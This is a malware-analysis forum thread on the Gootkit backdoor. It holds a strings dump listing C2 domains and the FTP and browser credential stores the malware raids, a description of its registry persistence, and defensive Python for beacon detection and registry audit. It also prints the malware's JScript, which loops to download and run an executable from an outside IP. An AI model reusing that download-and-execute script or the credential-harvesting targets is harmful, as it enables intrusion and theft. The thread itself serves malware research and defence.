Win32/Gootkit

Postby EP_X0FF » Tue Jun 08, 2010 2:36 pm

Backdoor trojan, probably of Russian origin.

Dropper VT result

http://www.virustotal.com/analisis/08e858ca0e6a1e8bdb965400f9738368d5fbba91fc3658267e843f64d7661c0f-1276006713

Container with malicious payload dll inside.

Spawns a copy of svchost.exe with the GootkitSSO component (see below) loaded as a library.
Downloads an additional component, stores it in the %temp% directory and then executes it from svchost.

Extracted executable VT result
http://www.virustotal.com/analisis/e8fcd05758a8e1a4bf945f4913e10557b80120f25e329f06d8642017dd353787-1276006850

Strings:
Mutant
\\.\PrepetiumVirta
POST %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: %s
Accept: text/html
Connection: Keep-Alive
Content-Length: %d
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="data"
----------XEqOcMUhJz1uu5ZoHVzpHt
**RetCode:
Gootkit ldr 4
GET
%d%d%d.exe
heathen.cc
v00d00.org
ru7noh8quoob8moh.com
taishous4nohshiy.com
oyah9eeshacei2ae.com
SYSTEM\
Randseed_1
Randseed_2
SYSTEM\
Randseed_1
Randseed_2
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
SetIEPolicy: break
http://www.vedomosti.ru/
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\%s\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
[nothing]
@xh$\\?\globalroot\systemroot\system32\drivers\vitra.sys
\SystemRoot\System32\drivers\vitra.sys
BPSitelist
Port
Password
Login
SiteAddress
Site%d
NumEntries
Main
Software\BPFTP\Bullet Proof FTP\
Software\BPFTP
InstallDir1
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP\Bullet Proof FTP\Options
SitesDir
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Main
LastSessionFile
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
Hostname
Username
Software\CoffeeCup Software\Internet\Profiles
hdfzpysvpzimorhk
User
Host
Software\FTPWare\COREFTP\Sites
CryptUnprotectData
crypt32.dll
smdata.dat
tree.dat
sm.dat
\GlobalSCAPE\CuteFTP Pro\
\GlobalSCAPE\CuteFTP\
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
cuteftppro.exe
cutftp32.exe
HostName
Software\Far\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
HostAdrs
UserName
Software\Sota\FFFTP\Options
Pass
Server
Servers
FileZilla3
\FileZilla\sitemanager.xml
yA36zA48dEhfrvghGRg57h5UlDv3
\History.dat
\Quick.dat
\Sites.dat
DataFolder
Software\FlashFXP\3
Install Path
Software\FlashFXP
path
\FlashFXP\3
Item
Ftp
\Frigate3\FtpSite.XML
FTP Commander Deluxe
FTP Commander
FTP Navigator
FTP Commander Pro
anonymous
ftplist.txt
UninstallString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
Software\FTP Explorer\Profiles
v00d00.org/put_accs.dll
\FTPRush\RushSite.xml
rh$M
rh$D
rh$B
rh$Val
rh$ForceRemove
sh$NoRemove
sh$Delete
sh$AppID
CLSID
Component Categories
FileType
Interface
Hardware
Mime
SAM
SECURITY
SYSTEM
Software
TypeLib
\signons3.txt
\signons2.txt
\signons.txt
Install Directory
\Main
Software\Mozilla\Mozilla Firefox
Path
Profile0
IsRelative
profiles.ini
\Mozilla\Firefox\
SECITEM_FreeItem
PK11_FreeSlot
NSS_Shutdown
PK11SDR_Decrypt
PK11_Authenticate
PK11_GetInternalKeySlot
NSSBase64_DecodeBuffer
NSS_Init
nss3.dll
softokn3.dll
plds4.dll
plc4.dll
nspr4.dll
http
Log profile
\Opera
\profile\wand.dat
Software\Opera Software
Last Directory3
kDPAPI:
MS IE FTP Passwords
WininetCacheCredentials
https://
http://
ftp://
:StringData
internet explorer
PStoreCreateInstance
pstorec.dll
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
abe2869f-9b47-4cd9-a358-c22904dba7f7
D:"Transfer Port"
S:"Password"
S:"Username"
S:"Hostname"
\Sessions
Software\VanDyke\SecureFX
Config Path
\VanDyke\Config\Sessions
FavoriteItem
\SmartFTP\Client 2.0\Favorites
#text
InstallDir
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
password
username
host
connections
\wcx_ftp.ini

and more strings.

Registers the dll through the [b]HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad[/b] key as [b]GootkitSSO[/b].

[url]http://www.virustotal.com/analisis/7b4fa216a467b10159cd08fe7bcc6a8a00990fd08204de01a1ff2838c60d8ae0-1276007178[/url]

The dll also contains a few strings.

The gtk1 process keeps connections with

78.140.15.82:1863 and 443 (https)
27.152.135.79:3129 (which belongs to IP addresses affiliated with the control panel of the [b]Eleonore Exploits[/b] pack)

Named Gootkit because of the numerous strings inside and the mutex [quote]\BaseNamedObjects\gootkit[/quote]

Produces debug output (after reboot)
[quote]Script Entry()
start thread for 'hxxp://78.140.15.82/quu3aiVai7Lei6epha7azoYegah4da9za2rec8ahngoosu7tuneemoizee5vael5eBoazahHephaahohTa3eecoochaiseesheichoh7aikuz0uas8zeekiaChiayeVa/scripts/thread1.script'
thread1 Entry()[/quote]

Script below:
[quote]//#JScript
PrintValue("thread1 Entry()");
//**********************************************************************
//  BASIC Variables,
//  Do not remove.
//**********************************************************************
var FILE_ATTRIBUTE_DIRECTORY=0x00000010,
   FILE_ATTRIBUTE_READONLY=0x00000001, 
   FILE_ATTRIBUTE_HIDDEN=0x00000002,
   FILE_ATTRIBUTE_SYSTEM=0x00000004, 
   FILE_ATTRIBUTE_DIRECTORY=0x00000010, 
   FILE_ATTRIBUTE_ARCHIVE=0x00000020, 
   FILE_ATTRIBUTE_DEVICE=0x00000040, 
   FILE_ATTRIBUTE_NORMAL=0x00000080, 
   FILE_ATTRIBUTE_TEMPORARY=0x00000100, 
   FILE_ATTRIBUTE_SPARSE_FILE=0x00000200, 
   FILE_ATTRIBUTE_REPARSE_POINT=0x00000400, 
   FILE_ATTRIBUTE_COMPRESSED=0x00000800, 
   FILE_ATTRIBUTE_OFFLINE=0x00001000, 
   FILE_ATTRIBUTE_NOT_CONTENT_INDEXED=0x00002000, 
   FILE_ATTRIBUTE_ENCRYPTED=0x00004000, 
   FILE_ATTRIBUTE_VIRTUAL=0x00010000; 

var RESUME_PROCESS_THREADS = 1,
    SUSPEND_PROCESS_THREADS = 0;

var DEBUG_PRIVELEGES_ENABLED = 1,
    DEBUG_PRIVELEGES_DISABLED = 0;

var IE_WAIT_FOR_PAGE = 1,
    IE__DONT_WAIT_FOR_PAGE = 0;

var IPPROTO_IP = 0,
    IPPROTO_ICMP = 1,
    IPPROTO_TCP = 6,
    IPPROTO_PUP = 12,
    IPPROTO_UDP = 17,
    IPPROTO_IDP = 22,
    IPPROTO_ND = 77;

var HKEY_CLASSES_ROOT = 0,
    HKEY_CURRENT_USER = 1,
    HKEY_LOCAL_MACHINE = 2,
    HKEY_USERS = 3,
    HKEY_PERFORMANCE_DATA = 4,
    HKEY_PERFORMANCE_TEXT = 5,
    HKEY_PERFORMANCE_NLSTEXT = 6,
    HKEY_CURRENT_CONFIG = 7,
    HKEY_DYN_DATA = 8,
    HKEY_CURRENT_USER_LOCAL_SETTINGS = 9;

var REG_SZ = 1,
    REG_EXPAND_SZ = 2,
    REG_DWORD = 4,
    REG_DWORD_BIG_ENDIAN = 5;

var WAIT_INFINITI = -1;
var OpenFileForReading = 1, OpenFileForWriting = 2, OpenFileForAppending = 8;
var TristateUseDefault = -2, TristateTrue = -1, TristateFalse = 0;

//**********************************************************************
//  BASIC Functions,
//  Do not remove.
//**********************************************************************
function isInt(x) {
    var y=parseInt(x);
    if (isNaN(y)) return false;
    return x==y && x.toString()==y.toString();
}

function strpos( haystack, needle, offset) {
   if(offset) offset = offset ;
   else offset = 0 ;
   return haystack.indexOf(needle, offset);
}

function stristr (haystack, needle, bool) {
    var pos = 0;
 
    haystack += '';
    pos = haystack.toLowerCase().indexOf( (needle+'').toLowerCase() );
    if (pos == -1){
        return false;
    } else{
        if (bool) {
            return haystack.substr( 0, pos );
        } else{
            return haystack.slice( pos );
        }
    }
}

function ProcessCreatedCallback(pid, path, cmdline, waitorno){
}

while(true){
   var tempfile = wapi_GetTempFileName();

   var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
   
   xmlhttp.open("GET", "hxxp://78.140.15.82/protod.exe", false);
   xmlhttp.send();
   
   if(xmlhttp.status == 200){
      var stream = new ActiveXObject("ADODB.Stream");
      stream.Type = 1;
      stream.Open();
      stream.Write(xmlhttp.responseBody);
      stream.Flush();
      stream.Position = 0;
      stream.SaveToFile(tempfile, 2);
      stream.Close();
      delete stream;
      calcpid = papi_ExecCommandLine(tempfile, "", IE_WAIT_FOR_PAGE, "ProcessCreatedCallback");
   }
   
   delete xmlhttp;
   wapi_Sleep(5000);
}

PrintValue("thread1 End()");
[/quote]



Protod.exe attached in gtk1.rar
Ring0 - the source of inspiration
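
Added example (not part of EP_X0FF's post and not code from the malware): a small Python scanner that matches one raw HTTP request against the beacon format visible in the strings dump above (the hardcoded User-Agent, the multipart boundary ----------XEqOcMUhJz1uu5ZoHVzpHt, the name="data" form field and the five domains) and pulls the **RetCode: marker out of a server reply. The sample traffic is constructed; the request path /gate.php and the layout after **RetCode: are assumptions, since the strings give the marker but not what follows it.

```python
"""Match raw HTTP requests against the Gootkit loader beacon seen in the strings."""

# Indicators copied verbatim from the strings dump in the post.
GOOTKIT_UA = b"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)"
GOOTKIT_BOUNDARY = b"----------XEqOcMUhJz1uu5ZoHVzpHt"
GOOTKIT_FIELD = b'Content-Disposition: form-data; name="data"'
GOOTKIT_RETCODE = b"**RetCode:"
GOOTKIT_DOMAINS = {
    b"heathen.cc", b"v00d00.org", b"ru7noh8quoob8moh.com",
    b"taishous4nohshiy.com", b"oyah9eeshacei2ae.com",
}


def parse_http_request(raw):
    """Split one raw HTTP/1.1 request into (method, target, headers, body).

    Header names are lower-cased. Returns None for anything that is not a
    well-formed request head, so malformed traffic cannot crash the scan.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    request_line = lines[0].split(b" ")
    if len(request_line) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon:
            return None
        headers[name.strip().lower()] = value.strip()
    return request_line[0], request_line[1], headers, body


def gootkit_indicators(raw):
    """Return the set of Gootkit beacon indicators present in one request."""
    parsed = parse_http_request(raw)
    if parsed is None:
        return set()
    method, _target, headers, body = parsed
    hits = set()
    if headers.get(b"user-agent") == GOOTKIT_UA:
        hits.add("user-agent")
    ctype = headers.get(b"content-type", b"")
    if ctype.startswith(b"multipart/form-data") and GOOTKIT_BOUNDARY in ctype:
        hits.add("boundary")
    if method == b"POST" and GOOTKIT_FIELD in body:
        hits.add("form-field")
    host = headers.get(b"host", b"").split(b":")[0].lower()
    if host in GOOTKIT_DOMAINS:
        hits.add("c2-domain")
    return hits


def is_gootkit_beacon(raw):
    """The hardcoded boundary alone is decisive; otherwise require two weaker
    indicators so ordinary MSIE 6 uploads are not flagged on User-Agent alone."""
    hits = gootkit_indicators(raw)
    return "boundary" in hits or len(hits) >= 2


def retcode_from_response(body):
    """Extract the text after the '**RetCode:' marker the loader looks for.
    Assumption: the value ends at the next line break (not given in the strings)."""
    idx = body.find(GOOTKIT_RETCODE)
    if idx < 0:
        return None
    rest = body[idx + len(GOOTKIT_RETCODE):]
    return rest.split(b"\n", 1)[0].strip().decode("ascii", "replace")


# Constructed sample traffic; the path /gate.php is invented for the example.
_BEACON_BODY = (
    b"--" + GOOTKIT_BOUNDARY + b"\r\n" + GOOTKIT_FIELD + b"\r\n\r\n"
    b"Gootkit ldr 4\r\n"
    b"--" + GOOTKIT_BOUNDARY + b"--\r\n"
)
SAMPLE_BEACON = (
    b"POST /gate.php HTTP/1.1\r\n"
    b"User-Agent: " + GOOTKIT_UA + b"\r\n"
    b"Host: v00d00.org\r\n"
    b"Accept: text/html\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Length: " + str(len(_BEACON_BODY)).encode() + b"\r\n"
    b"Content-Type: multipart/form-data; boundary=" + GOOTKIT_BOUNDARY + b"\r\n"
    b"\r\n" + _BEACON_BODY
)
SAMPLE_BENIGN = (
    b"GET /index.html HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)\r\n"
    b"Host: www.example.com\r\n"
    b"\r\n"
)
SAMPLE_REPLY = b"HTTP/1.1 200 OK\r\n\r\n**RetCode: 0\r\nhello"

if __name__ == "__main__":
    for label, req in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        print(label, sorted(gootkit_indicators(req)), is_gootkit_beacon(req))
    print("retcode:", retcode_from_response(SAMPLE_REPLY))
```

The boundary is the strongest signal because it is a literal in the binary rather than a per-request random value; the User-Agent and the fixed form field name are weaker on their own, and the domain list only covers the samples in this post, so treat the verdict as a triage hint and confirm with the mutex and registry artifacts described above.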

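Added example (again not from the post): a Python audit of the ShellServiceObjectDelayLoad key that the GootkitSSO entry abuses for persistence. The pure function takes the value-name to CLSID map and the CLSID to InprocServer32 map so it runs offline; the winreg collector only runs on Windows. The baseline value names are assumed defaults for Windows XP and should be adjusted per build; every CLSID and the dll path in the sample are placeholders, not values taken from a real infection.

```python
"""Audit the ShellServiceObjectDelayLoad key that Gootkit uses for persistence."""
import os
import sys

SSODL_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"

# Assumed default value names on Windows XP; adjust for the build you audit.
XP_BASELINE = frozenset({"PostBootReminder", "CDBurn", "WebCheck", "SysTray"})


def audit_ssodl(entries, inproc_servers, baseline=XP_BASELINE,
                system32=r"C:\WINDOWS\system32"):
    """Flag suspicious delay-load shell service objects.

    entries:        {value name: CLSID} as read from the SSODL key
    inproc_servers: {CLSID: InprocServer32 dll path}, already env-expanded
    Returns (value name, CLSID, dll, reason) for every entry that is not in
    the baseline, has no InprocServer32, or points outside system32.
    """
    findings = []
    prefix = system32.lower().rstrip("\\") + "\\"
    for name, clsid in entries.items():
        dll = inproc_servers.get(clsid)
        reasons = []
        if name not in baseline:
            reasons.append("not in baseline")
        if dll is None:
            reasons.append("CLSID has no InprocServer32")
        elif not dll.lower().startswith(prefix):
            reasons.append("dll outside system32")
        if reasons:
            findings.append((name, clsid, dll, "; ".join(reasons)))
    return findings


def collect_from_registry():
    """Live collection with winreg. Run with a Python of the OS bitness so the
    64-bit registry view (the one explorer.exe reads) is what gets audited."""
    if sys.platform != "win32":
        raise OSError("registry collection requires Windows")
    import winreg
    entries, inproc = {}, {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SSODL_KEY) as key:
        index = 0
        while True:
            try:
                name, clsid, _kind = winreg.EnumValue(key, index)
            except OSError:
                break
            entries[name] = clsid
            index += 1
    for clsid in set(entries.values()):
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                                r"CLSID\%s\InprocServer32" % clsid) as sub:
                inproc[clsid] = os.path.expandvars(winreg.QueryValueEx(sub, "")[0])
        except OSError:
            pass  # dangling CLSID: audit_ssodl reports it as missing
    return entries, inproc


# Constructed sample: all CLSIDs and the GootkitSSO dll path are placeholders.
SAMPLE_ENTRIES = {
    "PostBootReminder": "{00000000-0000-0000-0000-000000000001}",
    "CDBurn":           "{00000000-0000-0000-0000-000000000002}",
    "WebCheck":         "{00000000-0000-0000-0000-000000000003}",
    "SysTray":          "{00000000-0000-0000-0000-000000000004}",
    "GootkitSSO":       "{00000000-0000-0000-0000-000000000005}",
}
SAMPLE_INPROC = {
    "{00000000-0000-0000-0000-000000000001}": r"C:\WINDOWS\system32\shell32.dll",
    "{00000000-0000-0000-0000-000000000002}": r"C:\WINDOWS\system32\shell32.dll",
    "{00000000-0000-0000-0000-000000000003}": r"C:\WINDOWS\system32\webcheck.dll",
    "{00000000-0000-0000-0000-000000000004}": r"C:\WINDOWS\system32\stobject.dll",
    "{00000000-0000-0000-0000-000000000005}": r"C:\DOCUME~1\user\LOCALS~1\Temp\gtk.dll",
}

if __name__ == "__main__":
    data = collect_from_registry() if sys.platform == "win32" else (SAMPLE_ENTRIES, SAMPLE_INPROC)
    for finding in audit_ssodl(*data):
        print("SUSPICIOUS: %s %s -> %s (%s)" % finding)
```

Entries under this key are loaded by explorer.exe when the shell starts, which is why the debug output above only appears after a reboot; a dll in system32 with a baseline-looking name still deserves a signature check, so treat "in baseline" as a filter for noise rather than proof of legitimacy.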
Re: Backdoor Gootkit

Postby gjf » Thu Jun 10, 2010 10:50 am

Just because you have named it so! :)
Backdoor.Win32.Gootkit.a
VirusInfo / Defendium / SafeZone Helpers Crew

Re: Backdoor Gootkit

Postby NOP » Sun Jun 20, 2010 11:15 am

Gootkit v2.1

SYS (packed) strings:

Gootkit v2.1
Fuck you, dumper :\
\SystemRoot\system32\kernel32.dll
\SystemRoot\system32\ntdll.dll
rk.sys
DllEntryPoint

Vundo Reverse Engineering of Dropper-KMode Driver #1

Postby Evilcry » Tue Jun 29, 2010 7:20 am

Hi,

Due to the large number of screenshots, I attach the direct link to Backdoor Gootkit Reverse Engineering of Dropper-KMode Driver and Network Analysis #1:

http://evilcodecave.blogspot.com/2010/06/backdoor-gootkit-reverse-engineering-of.html

Soon I'll publish the second episode; attached is the malicious dll carved out from the TCP stream.


Have a nice Day,
Giuseppe 'Evilcry' Bonfa

Re: Backdoor:Win32/Otlard.A (alias Gootkit)

Postby EP_X0FF » Sun Jan 04, 2015 4:38 am

Up. Presumably the first generation of the Gootkit malware family.